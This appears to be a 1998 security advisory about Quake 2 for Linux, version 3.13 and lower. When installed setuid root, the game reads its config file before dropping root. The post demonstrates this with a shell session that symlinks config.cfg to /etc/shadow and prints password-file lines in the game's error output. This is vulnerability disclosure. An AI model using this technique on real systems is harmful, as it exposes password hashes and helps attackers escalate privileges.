Quake 2 Linux 3.13 (and lower) allow users to read arbitrary files

Wed, 25 Feb 1998 05:49:58 -0500

Everyone who followed the installation instructions and made Quake2 setuid

Quake2 reads its conf files (and .pak files) before giving up root,
and it doesn't check the permissions before hand.

nop@chrome:~> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~> mkdir baseq2
nop@chrome:~> ln -s /etc/shadow baseq2/config.cfg
nop@chrome:~> ls -l /usr/games/quake/quake2
-rws--x--x 1 root root 303444 Feb 24 19:07
nop@chrome:~> /usr/games/quake/quake2
couldn't exec default.cfg
execing config.cfg
Unknown command "root:[snip]:10137:0:99999:7:::"
Unknown command "bin:*:9977:0:99999:7:::"
Unknown command "daemon:*:9977:0:99999:7:::"
Unknown command "adm:*:9977:0:99999:7:::"
Unknown command "lp:*:9977:0:99999:7:::"